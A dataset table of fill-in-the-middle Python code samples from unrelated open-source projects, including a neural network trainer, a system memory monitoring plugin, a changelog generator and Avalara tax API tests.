repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
gnrhxni/CS542 | multiple_nn.py | Python | gpl-3.0 | 7,175 | 0.018815 | #!/usr/bin/python
import os
import re
import sys
import numpy
import pybrain
import pickle
import math
import time
import random
from nettalk_data import *
from constants import *
from pybrain.datasets import SupervisedDataSet
from pybrain.supervised.trainers import BackpropTrainer
from pybrain.structure.modules import Line | arLayer, Sigm | oidLayer, BiasUnit
from pybrain.structure.networks import FeedForwardNetwork
from pybrain.structure import FullConnection
from pybrain.datasets import SupervisedDataSet
from sigmoidsparselayer import SigmoidSparseLayer
from pybrain.tools.shortcuts import buildNetwork
from prevent_overtraining import PreventOverTrainer
from nettalk_modules import *
WORDSTRAINED=25000
children = []
master = None
def setup(numNetworks = 1, hidden=80, hidden2=0, forgiving=False):
child_networks = []
for i in range(numNetworks):
neural_network = buildnet(buildModules(NUMINPUTS, hidden, NUMOUTPUTS, hidden2=hidden2))
newWeights = np.random.uniform(-0.3, 0.3, len(neural_network.params))
neural_network._setParameters(newWeights)
child_networks.append(neural_network)
master_network = buildnet(buildModules(NUMOUTPUTS*numNetworks, hidden, NUMOUTPUTS, hidden2=hidden2))
newWeights = np.random.uniform(-0.3, 0.3, len(neural_network.params))
master_network._setParameters(newWeights)
return (child_networks, master_network)
def createDatasetFromWord(word):
output = outputUnits(word)
ds = SupervisedDataSet(NUMINPUTS, NUMOUTPUTS)
char_pos = 0
#loop through each letter in the word, and center it in a 7-character sequence
for letter in wordstream(input_entries = (word,)):
for binary_input in convertToBinary(letter):
binary_output = output[char_pos]
ds.addSample(binary_input, binary_output)
char_pos+= 1
return ds
def createMasterDataset(words, networks):
ds = SupervisedDataSet(NUMOUTPUTS*len(networks), NUMOUTPUTS)
for word in words:
output = outputUnits(word)
char_pos = 0
#loop through each letter in the word, and center it in a 7-character sequence
for letter in wordstream(input_entries = (word,)):
for binary_input in convertToBinary(letter):
final_input = []
binary_output = output[char_pos]
for (network, trainer) in networks:
final_input = final_input + network.activate(binary_input).tolist()
ds.addSample(final_input, binary_output)
char_pos+= 1
return ds
def testOneWord(children, word, output=None):
""" Return (phoneme_error, stress_error) lists
The lists are parallel and indexed by letter position
in the input word, which must be a DictionaryEntry.
if output is missing, it is calculated, but it can also
be passed in to save time if we already have it"""
phoneme_error = list()
stress_error = list()
if (None == output): output = outputUnits(word)
char_pos = 0
for letter in wordstream(input_entries = (word,)):
#now convert these 7-character sequences into binary
for binary_input in convertToBinary(letter):
final_input = None;
#determine the corresponding correct output and add the sample to the dataset
binary_output = output[char_pos]
for (network, trainer) in children:
if final_input == None:
final_input = network.activate(binary_input)
else:
final_input = np.array(final_input) + np.array(network.activate(binary_input))
network_output = final_input/len(children)
phoneme = word.phonemes[char_pos]
stress = word.stress[char_pos]
calculated_phoneme = closestByDotProduct(network_output[:MINSTRESS], articFeatures)
calculated_stress = closestByDotProduct(network_output[MINSTRESS:], stressFeatures)
phoneme_error.append(bool(phoneme != calculated_phoneme))
stress_error.append(bool(stress != calculated_stress))
char_pos = char_pos + 1
return (phoneme_error, stress_error)
def testWords(children, inputfile):
phoneme_error = list()
stress_error = list()
#loop through each word in our data, treating each one as a seperate dataset
for word in dictionary(inputfile):
(pherrors, serrors) = testOneWord(children, word);
phoneme_error.extend(pherrors);
stress_error.extend(serrors);
print("Generalization: phoneme %.3f stress %.3f" % ( 1-np.mean(phoneme_error), 1-np.mean(stress_error)) )
return ( 1-np.mean(phoneme_error), 1-np.mean(stress_error))
def trainNetwork(children, master, trainfile, testfile, outfile, testSkip=1000):
ret = ([], [], [])
numChildren = len(children)
cycle = 0
#loop through each word in our data, treating each one as a seperate dataset
curWords = []
for word in dictionary(trainfile):
(neural_network, trainer) = children[cycle]
trainer.setData(createDatasetFromWord(word))
err = trainer.train()
cycle += 1
curWords.append(word)
if cycle == numChildren:
cycle = 0
if (numChildren > trainNetwork.counter % testSkip):
testerror = testWords(children, testfile);
ret[0].append(trainNetwork.counter);
ret[1].append(testerror[0]);
ret[2].append(testerror[1]);
outfile.write("%d %.3f %.3f\n" % (trainNetwork.counter, testerror[0], testerror[1]))
outfile.flush();
trainNetwork.counter += numChildren
return ret;
trainNetwork.counter=0
def main():
experiment = [];
hidden=80
hidden2=0
lrate=0.4
beta=0
r=0.5
numNetworks = int(sys.argv[1])
testSkip=1000
f = open('nettalk.data','r');
f1 = open('temptrain','w');
f2 = open('temptest','w');
l1 = set()
l2 = set()
# Put all the lines in f in random order into f1 and f2
# in the proportion described by "proportion"
for l in f.readlines():
if (random.random() < 0.5): l1.add(l)
else: l2.add(l);
for l in l1: f1.write(l);
for l in l2: f2.write(l);
f.close(); f1.close(); f2.close();
for (train, test) in (('temptrain','temptest'),):
(child_networks, master_network) = setup(numNetworks, hidden, hidden2)
for child_network in child_networks:
child_trainer = BackpropTrainer(child_network, None, learningrate=lrate, verbose=True, batchlearning=True, weightdecay=0.0)
children.append((child_network, child_trainer))
master_trainer = BackpropTrainer(master_network, None, learningrate=lrate, verbose=True, batchlearning=True, weightdecay=0.0)
master = (master_network, master_trainer)
fname = 'numChildren_%.1f.%d' % (numNetworks, int(time.time()))
outfile = open(fname,'w')
trainNetwork.counter=0
while trainNetwork.counter < WORDSTRAINED:
trainerror = trainNetwork(children, master, train, test, outfile, testSkip=testSkip)
experiment.append(trainerror)
if __name__ == '__main__':
main()
|
MacHu-GWU/elementary_math-project | start-a-project/init_project.py | Python | mit | 3,304 | 0.001211 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This script can generate automate scripts for open source python project.
Scroll to ``if __name__ == "__main__":`` for more info.
"""
from __future__ import print_function
import sys
import datetime
from os import walk, mkdir
from os.path import join, abspath, dirname, basename
def write(s, path, encoding="utf-8"):
"""Write string to text file.
"""
with open(path, "wb") as f:
f.write(s.encode(encoding))
def read(path, encoding="utf-8"):
"""Read string from text file.
"""
with open(path, "rb") as f:
return f.read().decode(encoding)
def initiate_project(
package_name,
repo_name,
python_version,
github_username,
author_name,
author_email,
maintainer_name,
maintainer_email,
year,
s3_bucket,
):
"""
Generate project start files.
"""
print("Initate '%s-project' from template ..." % package_name)
template_dir = join(dirname(abspath(__file__)), "template")
output_dir = join(dirname(abspath(__file__)), "%s-project" % package_name)
for src_dir, dir_list, file_list in walk(template_dir):
# destination directory
dst_dir = src_dir.replace(template_dir, output_dir, 1)
if basename(dst_dir) == "__package__":
dst_dir = join(dirname(dst_dir), p | ackage_name)
# make destination direc | tory
try:
print(" Create '%s' ..." % dst_dir)
mkdir(dst_dir)
except:
pass
# files
for filename in file_list:
src = join(src_dir, filename)
dst = join(dst_dir, filename)
content = read(src).\
replace("{{ package_name }}", package_name).\
replace("{{ repo_name }}", repo_name).\
replace("{{ python_version }}", python_version).\
replace("{{ github_username }}", github_username).\
replace("{{ author_name }}", author_name).\
replace("{{ author_email }}", author_email).\
replace("{{ maintainer_name }}", maintainer_name).\
replace("{{ maintainer_email }}", maintainer_email).\
replace("{{ year }}", year).\
replace("{{ s3_bucket }}", s3_bucket)
print(" Create '%s' ..." % dst)
write(content, dst)
print(" Complete!")
if __name__ == "__main__":
# --- EDIT THESE VARIABLE based on your own situation ---
package_name = "picage" # IMPORTANT
repo_name = "{package_name}-project".format(package_name=package_name)
python_version = "python%s%s" % (
sys.version_info.major, sys.version_info.minor)
github_username = "MacHu-GWU" # IMPORTANT
author_name = "Sanhe Hu" # IMPORTANT
author_email = "husanhe@gmail.com" # IMPORTANT
maintainer_name = author_name
maintainer_email = author_email
year = str(datetime.datetime.utcnow().year)
s3_bucket = "www.wbh-doc.com" # IMPORTANT
initiate_project(
package_name,
repo_name,
python_version,
github_username,
author_name,
author_email,
maintainer_name,
maintainer_email,
year,
s3_bucket,
) |
shackra/thomas-aquinas | tests/test_accelerate.py | Python | bsd-3-clause | 833 | 0.02401 | # coding: utf-8
testinfo = "s, t 4, s, t 8, s, t 10.1, s, q"
tags = "Accelerate"
from summa.layer import Layer
from summa.director import director
from summa.actions import Accelerate, Rotate
from summa.sprite import Sprite
import customstuff
import pyglet
import os
pyglet.resource.path.append(
os.path.join(os.path.dirname(os.path.realpath(__file__))))
pyglet.resource.reindex( | )
class TestLayer(Layer):
def __init__(self):
super( TestLayer, self ).__init__()
x, y = director.get_window_size()
self.sprite = Sprite( 'grossini.png', (x/2, y/2) )
self.add( self.sprite )
self.sprite.do( Accelerate( Rotate( 360, 10 ), 4 ) )
def test_accelerate():
director. | init()
test_layer = TestLayer()
main_scene = customstuff.TimedScene(test_layer)
director.run(main_scene)
|
Rocky5/XBMC-Emustation | Mod Files/emustation/scripts/not used/Other/Remove _Resources.py | Python | gpl-3.0 | 1,405 | 0.036299 | import os, shutil, xbmc, xbmcgui
pDialog = xbmcgui.DialogProgress()
dialog = xbmcgui.Dialog()
Game_Directories = [ "E:\\Games\\", "F:\\Games\\", "G:\\Games\\", "E:\\Applications\\", "F:\\Applications\\", "G:\\Applications\\", "E:\\Homebrew\\", "F:\\Homebrew\\", "G:\\Homebrew\\", "E:\\Apps\\", "F:\\Apps\\", "G:\\Apps\\", "E:\\Ports\\", "F:\\Ports\\", "G:\\Ports\\" ]
for Game_Directories in Game_Directories:
if os.path.isdir( Game_Directories ):
pDialog.create( "PARSING XBOX GAMES","Initializing" )
pDialog.update(0,"Removing _Resources Folders","","This can take some time, please be patient.")
for Items in sorted( os.listdir( Game_Directories ) ):
if os.path.isdir(os.path.join( Game_Directories, Items)):
Game_Directory = os.path.join | ( Game_Directories, Items )
_Resources = os.path.join( Game_Directory, "_Resources" )
DefaultTBN = os.path.join( Ga | me_Directory, "default.tbn" )
FanartJPG = os.path.join( Game_Directory, "fanart.jpg" )
if os.path.isdir(_Resources):
shutil.rmtree(_Resources)
else:
print "Cannot find: " + _Resources
if os.path.isfile(DefaultTBN):
os.remove(DefaultTBN)
else:
print "Cannot find: " + DefaultTBN
if os.path.isfile(FanartJPG):
os.remove(FanartJPG)
else:
print "Cannot find: " + FanartJPG
pDialog.close()
dialog.ok("COMPLETE","Done, _Resources Folders Removed.") |
stdweird/aquilon | lib/python2.6/aquilon/worker/formats/network_environment.py | Python | apache-2.0 | 1,413 | 0.001415 | # -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2009,2010,2011,2012,2013 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License. |
"""Network environment formatter."""
from aquilon.aqdb.model import NetworkEnvironment
from aquilon.worker.formats.formatters import ObjectFormatter
class NetworkEnvironmentFormatter(ObjectFormatter):
def format_raw(self, netenv, indent=""):
details = [indent + "{0:c}: {0.name}".format(nete | nv)]
details.append(self.redirect_raw(netenv.dns_environment, indent + " "))
if netenv.location:
details.append(self.redirect_raw(netenv.location, indent + " "))
if netenv.comments:
details.append(indent + " Comments: %s" % netenv.comments)
return "\n".join(details)
ObjectFormatter.handlers[NetworkEnvironment] = NetworkEnvironmentFormatter()
|
desbma/glances | glances/plugins/glances_mem.py | Python | lgpl-3.0 | 11,139 | 0.002335 | # -*- coding: utf-8 -*-
#
# This file is part of Glances.
#
# Copyright (C) 2015 Nicolargo <nicolas@nicolargo.com>
#
# Glances is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Glances is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Virtual memory plugin."""
from glances.plugins.glances_plugin import GlancesPlugin
import psutil
# SNMP OID
# Total RAM in machine: .1.3.6.1.4.1.2021.4.5.0
# Total RAM used: .1.3.6.1.4.1.2021.4.6.0
# Total RAM Free: .1.3.6.1.4.1.2021.4.11.0
# Total RAM Shared: .1.3.6.1.4.1.2021.4.13.0
# Total RAM Buffered: .1.3.6.1.4.1.2021.4.14.0
# Total Cached Memory: .1.3.6.1.4.1.2021.4.15.0
# Note: For Windows, stats are in the FS table
snmp_oid = {'default': {'total': '1.3.6.1.4.1.2021.4.5.0',
'free': '1.3.6.1.4.1.2021.4.11.0',
| 'shared': '1.3.6.1.4.1.2021.4.13.0',
'buffers': '1.3.6.1.4.1.2021.4.14.0',
'cached': '1.3.6.1.4.1.2021.4.15.0'},
'windows': {'mnt_point': '1.3.6.1.2.1.25.2.3.1.3',
'alloc_unit': '1.3.6.1.2.1.25.2.3.1.4',
'size': '1.3.6.1.2.1.25.2.3.1.5',
'used': '1.3.6.1.2.1.25.2.3.1.6'},
| 'esxi': {'mnt_point': '1.3.6.1.2.1.25.2.3.1.3',
'alloc_unit': '1.3.6.1.2.1.25.2.3.1.4',
'size': '1.3.6.1.2.1.25.2.3.1.5',
'used': '1.3.6.1.2.1.25.2.3.1.6'}}
# Define the history items list
# All items in this list will be historised if the --enable-history tag is set
# 'color' define the graph color in #RGB format
items_history_list = [{'name': 'percent', 'color': '#00FF00', 'y_unit': '%'}]
class Plugin(GlancesPlugin):
"""Glances' memory plugin.
stats is a dict
"""
def __init__(self, args=None):
"""Init the plugin."""
GlancesPlugin.__init__(self, args=args, items_history_list=items_history_list)
# We want to display the stat in the curse interface
self.display_curse = True
# Init the stats
self.reset()
def reset(self):
"""Reset/init the stats."""
self.stats = {}
@GlancesPlugin._log_result_decorator
def update(self):
"""Update RAM memory stats using the input method."""
# Reset stats
self.reset()
if self.input_method == 'local':
# Update stats using the standard system lib
# Grab MEM using the PSUtil virtual_memory method
vm_stats = psutil.virtual_memory()
# Get all the memory stats (copy/paste of the PsUtil documentation)
# total: total physical memory available.
# available: the actual amount of available memory that can be given instantly to processes that request more memory in bytes; this is calculated by summing different memory values depending on the platform (e.g. free + buffers + cached on Linux) and it is supposed to be used to monitor actual memory usage in a cross platform fashion.
# percent: the percentage usage calculated as (total - available) / total * 100.
# used: memory used, calculated differently depending on the platform and designed for informational purposes only.
# free: memory not being used at all (zeroed) that is readily available; note that this doesn’t reflect the actual memory available (use ‘available’ instead).
# Platform-specific fields:
# active: (UNIX): memory currently in use or very recently used, and so it is in RAM.
# inactive: (UNIX): memory that is marked as not used.
# buffers: (Linux, BSD): cache for things like file system metadata.
# cached: (Linux, BSD): cache for various things.
# wired: (BSD, OSX): memory that is marked to always stay in RAM. It is never moved to disk.
# shared: (BSD): memory that may be simultaneously accessed by multiple processes.
self.reset()
for mem in ['total', 'available', 'percent', 'used', 'free',
'active', 'inactive', 'buffers', 'cached',
'wired', 'shared']:
if hasattr(vm_stats, mem):
self.stats[mem] = getattr(vm_stats, mem)
# Use the 'free'/htop calculation
# free=available+buffer+cached
self.stats['free'] = self.stats['available']
if hasattr(self.stats, 'buffers'):
self.stats['free'] += self.stats['buffers']
if hasattr(self.stats, 'cached'):
self.stats['free'] += self.stats['cached']
# used=total-free
self.stats['used'] = self.stats['total'] - self.stats['free']
elif self.input_method == 'snmp':
# Update stats using SNMP
if self.short_system_name in ('windows', 'esxi'):
# Mem stats for Windows|Vmware Esxi are stored in the FS table
try:
fs_stat = self.get_stats_snmp(snmp_oid=snmp_oid[self.short_system_name],
bulk=True)
except KeyError:
self.reset()
else:
for fs in fs_stat:
# The Physical Memory (Windows) or Real Memory (VMware)
# gives statistics on RAM usage and availability.
if fs in ('Physical Memory', 'Real Memory'):
self.stats['total'] = int(fs_stat[fs]['size']) * int(fs_stat[fs]['alloc_unit'])
self.stats['used'] = int(fs_stat[fs]['used']) * int(fs_stat[fs]['alloc_unit'])
self.stats['percent'] = float(self.stats['used'] * 100 / self.stats['total'])
self.stats['free'] = self.stats['total'] - self.stats['used']
break
else:
# Default behavor for others OS
self.stats = self.get_stats_snmp(snmp_oid=snmp_oid['default'])
if self.stats['total'] == '':
self.reset()
return self.stats
for key in list(self.stats.keys()):
if self.stats[key] != '':
self.stats[key] = float(self.stats[key]) * 1024
# Use the 'free'/htop calculation
self.stats['free'] = self.stats['free'] - self.stats['total'] + (self.stats['buffers'] + self.stats['cached'])
# used=total-free
self.stats['used'] = self.stats['total'] - self.stats['free']
# percent: the percentage usage calculated as (total - available) / total * 100.
self.stats['percent'] = float((self.stats['total'] - self.stats['free']) / self.stats['total'] * 100)
# Update the history list
self.update_stats_history()
# Update the view
self.update_views()
return self.stats
def update_views(self):
"""Update stats views."""
# Call the father's method
GlancesPlugin.update_views(self)
# Add specifics informations
# Alert and log
self.views['used']['decoration'] = self.get_alert_log(self.stats['used'], maximum=self.stats['total'])
# Optional
for key in ['active', 'inactive', 'buffers', 'cached']:
if key in self.stats:
self.views[key]['optional'] = True
def msg_curse(self, args=None):
"""Return the dict to display in the curse interface."""
# Init the return message
ret = []
|
alirizakeles/tendenci | tendenci/apps/directories/choices.py | Python | gpl-3.0 | 692 | 0.013006 | from django.utils.translation import ugettext_lazy as _
DURATION_CHOICES = (
(14, _('14 Days from Activation date')),
(60, _('60 Days from Activation date')),
(90,_('90 Days from Activation date')),
(120,_('120 Days from Activation date')),
(365,_('1 Year from Activation date')),
)
ADMIN_DURATION_CHOICES = (
(0, _('U | nlimited')),
(14,_('14 Days from Activation date')),
(30,_('30 Days from Activation date')),
(60,_('60 Days from Activation date')),
(90,_('90 Days from Activation date')),
(120,_('120 Days from Activation date')),
| (365,_('1 Year from Activation date')),
)
STATUS_CHOICES = (
(1, _('Active')),
(0, _('Inactive')),
)
|
intellij-rust/intellij-rust.github.io | changelog.py | Python | mit | 9,091 | 0.00176 | #!/usr/bin/env python3
import argparse
import datetime
import os
import re
import urllib.request
from dataclasses import dataclass
from typing import Set, List, Optional, Dict, TextIO
# https://github.com/PyGithub/PyGithub
from github import Github
from github.Milestone import Milestone
from github.Repository import Repository
PLUGIN_REPO = "intellij-rust/intellij-rust"
MAINTAINERS = [
"matklad",
"Undin",
"vlad20012",
"mchernyavsky",
"ortem",
"amakeev",
"MarinaKalashina",
"dima74",
"avrong",
"lancelote",
"ozkriff",
"mili-l",
"neonat",
"intellij-rust-bot",
"dependabot[bot]"
]
@dataclass
class ChangelogItem:
pull_request_id: int
description: str
username: str
def display(self):
if self.username in MAINTAINERS:
return "* [#{}] {}"\
.format(self.pull_request_id, self.description)
else:
return "* [#{}] {} (by [@{}])"\
.format(self.pull_request_id, self.description, self.username)
class ChangelogSection(object):
header: str
items: List[ChangelogItem]
def __init__(self, header: str):
self.header = header
self.items = []
def add_item(self, item: ChangelogItem):
self.items.append(item)
def display(self):
return """## {}\n\n""".format(self.header) + "\n\n".join(map(lambda l: l.display(), self.items))
class Changelog(object):
labels: List[str]
sections: Dict[str, ChangelogSection]
contributors: Set[str]
milestone_id: Optional[int]
def __init__(self, milestone_id=None):
self.milestone_id = milestone_id
self.labels = []
self.sections = {}
self.contributors = set()
self.__add_section("feature", ChangelogSection("New Features"))
self.__add_section("performance", ChangelogSection("Performance Improvements"))
self.__add_section("fix", ChangelogSection("Fixes"))
self.__add_section("internal", ChangelogSection("Internal Improvements"))
def __add_section(self, label: str, section: ChangelogSection):
self.labels.append(label)
self.sections[label] = section
def add_item(self, label: str, item: ChangelogItem):
section = self.sections.get(label)
if section is not None:
section.add_item(item)
if item.username not in MAINTAINERS:
self.contributors.add(item.username)
def write(self, f: TextIO):
for label in self.labels:
section = self.sections[label]
if section.items:
f.write(section.display())
f.write("\n\n")
if self.milestone_id is not None:
f.write("Full set of changes can be found [here]"
f"(https://github.com/{PLUGIN_REPO}/milestone/{self.milestone_id}?closed=1)\n")
if len(self.contributors) > 0:
f.write("\n")
sorted_contributors = sorted(self.contributors)
for name in sorted_contributors:
url = contributor_url(name)
f.write(url)
if len(self.labels) > 0:
pull_request_ids = set()
for label in self.labels:
section = self.sections[label]
for item in section.items:
pull_request_ids.add(item.pull_request_id)
f.write("\n")
for pull_request_id in sorted(pull_request_ids):
f.write(f"[#{pull_request_id}]: https://github.com/{PLUGIN_REPO}/pull/{pull_request_id}\n")
def collect_changelog(repo: Repository, milestone: Milestone):
print(f"Collecting changelog issues for `{milestone.title}` milestone")
changelog = Changelog(milestone.number)
issues = repo.get_issues(milestone=milestone, state="all")
comment_pattern = re.compile("<!--.*-->", re.RegexFlag.DOTALL)
changelog_description_pattern = re.compile("[Cc]hangelog:\\s*(?P<description>([^\n]+\n?)*)")
for issue in issues:
if issue.pull_request is None:
continue
labels: Set[str] = set(map(lambda l: l.name, issue.labels))
if len(labels) == 0:
continue
if issue.body is not None:
issue_text = re.sub(comment_pattern, "", issue.body).replace("\r\n", "\n")
else:
issue_text = ""
result = re.search(changelog_description_pattern, issue_text)
if result is not None:
description = result.group("description").strip().rstrip(".")
else:
description = issue.title
changelog_item = ChangelogItem(issue.number, description, issue.us | er.login)
for label in labels:
changelog.add_item(label, changelog_item)
return changelog
def main():
pars | er = argparse.ArgumentParser()
parser.add_argument("-c", action='store_true', help="add contributor links")
parser.add_argument("--offline", action='store_true', help="do not preform net requests")
parser.add_argument("--token", type=str, help="github token")
parser.add_argument("--login", type=str, help="github login")
parser.add_argument("--password", type=str, help="github password")
parser.add_argument("--list", type=int, nargs=2, metavar=('first', 'last'),
help="collect external contributors for all releases between first and last")
args = parser.parse_args()
if args.c:
contributors()
elif args.list:
contributor_list(args)
else:
new_post(args)
def construct_repo(args: argparse.Namespace) -> Repository:
if args.token is not None:
login_or_token = args.token
password = None
else:
login_or_token = args.login
password = args.password
g = Github(login_or_token, password)
return g.get_repo(PLUGIN_REPO)
def new_post(args: argparse.Namespace):
next_post = len(os.listdir("_posts"))
date = datetime.datetime.now()
changelog = Changelog()
if not args.offline:
expected_milestone_title = f"v{next_post}"
repo: Repository = construct_repo(args)
milestone: Optional[Milestone] = None
for m in repo.get_milestones():
if m.title == expected_milestone_title:
milestone = m
break
if milestone is None:
raise RuntimeError(f"Milestone `{expected_milestone_title}` is not found")
due_on = milestone.due_on
if due_on is not None:
date = due_on.replace(hour=13, minute=0, second=0) # 13:00 is our desired release time
changelog = collect_changelog(repo, milestone)
name = "_posts/{}-changelog-{}.markdown".format(date.date().isoformat(), next_post)
with open(name, 'w') as f:
f.write("""---
layout: post
title: "IntelliJ Rust Changelog #{}"
date: {}
---
""".format(next_post, date.strftime("%Y-%m-%d %H:%M:%S +0300")))
changelog.write(f)
def contributors():
last_post = "_posts/" + sorted(os.listdir("_posts"))[-1]
with open(last_post) as f:
text = f.read()
names = sorted({n[2:-1] for n in re.findall(r"\[@[^]]+]", text)})
with open(last_post) as f:
old_text = f.read()
with open(last_post, 'a') as f:
f.write("\n")
for name in names:
line = contributor_url(name)
if line not in old_text:
f.write(line)
def contributor_url(username: str):
url = "https://github.com/" + username
print("checking " + url)
req = urllib.request.Request(url, method="HEAD")
with urllib.request.urlopen(req) as _:
pass # will thrown on 404
line = "[@{}]: {}\n".format(username, url)
return line
def contributor_list(args: argparse.Namespace) -> None:
if args.list is None:
raise ValueError("list flag should be set")
first = args.list[0]
last = args.list[1]
if first >= last:
raise ValueError("`first` should be less than `last`")
repo = construct_repo(args)
milestones = repo.get_milestones(state="all", sort="due_on")
versions = {f"v{i}" for i in range(first, last + 1)}
contributors = set()
|
lionheart/pyavatax | test_avalara.py | Python | bsd-3-clause | 23,475 | 0.00443 | from pyavatax.base import Document, Line, Address, TaxOverride, AvalaraException, AvalaraTypeException, AvalaraValidationException, AvalaraServerNotReachableException
from pyavatax.api import API
import settings_local # put the below settings into this file, it is in .gitignore
import datetime
import pytest
import uuid
from testfixtures import LogCapture
def get_api(timeout=None):
return API(settings_local.AVALARA_ACCOUNT_NUMBER, settings_local.AVALARA_LICENSE_KEY, settings_local.AVALARA_COMPANY_CODE, live=False, timeout=timeout)
@pytest.mark.example
def test_avalara_and_http():
api = get_api()
data = {
"CustomerCode": "CUST1",
"CompanyCode": settings_local.AVALARA_COMPANY_CODE,
"Addresses":
[
{
"AddressCode": "1",
"Line1": "435 Ericksen Avenue Northeast",
"Line2": "#250",
"PostalCode": "98110"
}
],
"Lines":
[
{
"LineNo": "1",
"DestinationCode": "1",
"OriginCode": "1",
"Qty": 1,
"Amount": 10
},
{
"LineNo": "2",
"DestinationCode": "1",
"OriginCode": "1",
"Qty": 1,
"Amount": 10
}
]
}
stem = '/'.join([api.VERSION, 'tax', 'get'])
resp = api._post(stem, data)
assert resp.status_code == 200
@pytest.mark.example
@pytest.mark.from_data
def test_from_data_example():
api = get_api()
data = {
"CompanyCode": settings_local.AVALARA_COMPANY_CODE,
"CustomerCode": "AvaTim",
"DocCode": uuid.uuid4().hex,
"DocType": "SalesOrder",
"PosLaneCode": "pyavatax unit test",
"Client": "pyavatax",
"Addresses":
[
{
"AddressCode": "1",
"Line1": "435 Ericksen Avenue Northeast",
"Line2": "#250",
"City": "Bainbridge Island",
"Region": "WA",
"PostalCode": "98110",
"Country": "US",
},
{
"AddressCode": "2",
"Line1": "7562 Kearney St.",
"City": "Commerce City",
"Region": "CO",
"PostalCode": "80022-1336",
"Country": "US",
},
],
"Lines":
[
{
"LineNo": "1",
"DestinationCode": "2",
"OriginCode": "1",
"ItemCode": "AvaDocs",
"Description": "Box of Avalara Documentation",
"Qty": 1,
"Amount": "100",
},
],
}
tax = api.post_tax(data, commit=True)
assert tax.is_success is True
@pytest.mark.discount
@pytest.mark.discount_from_data
def test_discount_from_data_example():
api = get_api()
amount = 958.50
data = {'Addresses':
[
{'City': u'acton', 'Country': 'US', 'Region': u'MA', 'Line2': u'', 'Line1': u'68 river st', 'PostalCode': u'01720', 'AddressCode': 2},
{'City': 'Concord', 'Country': 'US', 'Region': 'MA', 'Line2': '', 'Line1': '130B Baker Avenue Extension', 'PostalCode': '01742', 'AddressCode': 1}
],
'DocCode': uuid.uuid4().hex,
'Lines': [
{'ItemCode': 'canon-eos-1dc', 'Discounted': True, 'LineNo': 1, 'DestinationCode': 2, 'Description': u'Canon EOS 1DC', 'Qty': 1L, 'Amount': 667.0, 'OriginCode': 1},
{'ItemCode': 'canon-24-70-f28l-ii', 'Discounted': True, 'LineNo': 2, 'DestinationCode': 2, 'Description': u'Canon 24-70 f/2.8L II', 'Qty': 1L, 'Amount': 111.0, 'OriginCode': 1},
{'ItemCode': 'sandisk-extreme-pro-cf-128gb', 'Discounted': True, 'LineNo': 3, 'DestinationCode': 2, 'Description': u'SanDisk Extreme Pro CF 128GB', 'Qty': 1L, 'Amount': 83.0, 'OriginCode': 1},
{'ItemCode': 'westcott-icelight', 'Discounted': True, 'LineNo': 4, 'DestinationCode': 2, 'Description': u'Westcott IceLight', 'Qty': 1L, 'Amount': 44.0, 'OriginCode': 1},
{'ItemCode': 'sennheiser-mke-400-camera-mic', 'Discounted': True, 'LineNo': 5, 'DestinationCode': 2, 'Description': u'Sennheiser MKE 400 On-Camera Mic', 'Qty': 1L, 'Amount': 53.5, 'OriginCode': 1},
],
'DocType': 'SalesOrder',
'Discount': str(amount),
'CustomerCode': 'details@activefrequency.com'
}
tax = api.post_tax(data, commit=True)
print tax.error
assert tax.is_success is True
assert float(tax.TotalTax) == 0
assert float(tax.TotalAmount) == amount
assert float(tax.TotalDiscount) == amount
@pytest.mark.get_tax
def test_gettax():
api = get_api()
# A Lat/Long from Avalara's documentation
lat = 47.627935
lng = -122.51702
line = Line(Amount=10.00)
doc = Document()
doc.add_line(line)
tax = api.get_tax(lat, lng, doc)
assert tax.is_success is True
assert tax.Tax > 0
assert tax.total_tax == tax.Tax
tax = api.get_tax(lat, lng, None, sale_amount=10.00)
assert tax.is_success is True
assert tax.Tax > 0
assert tax.total_tax == tax.Tax
# when dealing with line items going to different addresses, i.e. a drop-ship situation
# don't use the basic add_from/add_to_address helpers just manually match your own
# Origin and Destination codes for the addresses and line items
@pytest.mark.internals
def test_validation():
with pytest.raises(AvalaraValidationException) as e:
doc = Document(DocDate='foo') # testing date
assert e.value.code == AvalaraException.CODE_BAD_DATE
with pytest.raises(AvalaraValidationException) as e:
line = Line(Qty='foo') # testing int
assert e.value.code == AvalaraException.CODE_BAD_FLOAT
with pytest.raises(AvalaraValidationException) as e:
line = Line(Amount='foo') # testing float
assert e.value.code == AvalaraException.CODE_BAD_FLOAT
with pytest.raises(AvalaraValidationException) as e:
line = Line(ItemCode='this string is longer than fifty characters and should be stopped') # testing length
assert e.value.code == AvalaraException.CODE_TOO_LONG
doc = Document.new_sales_order(DocCode='1001', DocDate=datetime.date.today(), CustomerCode='email@email.com')
with pytest.raises(AvalaraValidationException) as e:
doc.validate()
assert e.value.code == AvalaraException.CODE_BAD_ADDRESS
from_address = Address(Line1="435 Ericksen Avenue Northeast", Line2="#250", PostalCode="98110")
to_address = Address(Line1="435 Ericksen Avenue Northeast", Line2="#250", PostalCode="98110")
doc.add_from_address(from_address)
doc.add_to_address(to_address)
with pytest.raises(AvalaraValidationException) as e:
doc.validate()
assert e.value.code == AvalaraException.CODE_BAD_LINE
with pytest.raises(AvalaraException) as e:
doc.a | dd_from_address(from_address)
| assert e.value.code == AvalaraException.CODE_HAS_FROM
with pytest.raises(AvalaraException) as e:
doc.add_to_address(to_address)
assert e.value.code == AvalaraException.CODE_HAS_TO
line = Line(Amount=10.00)
doc.add_line(line)
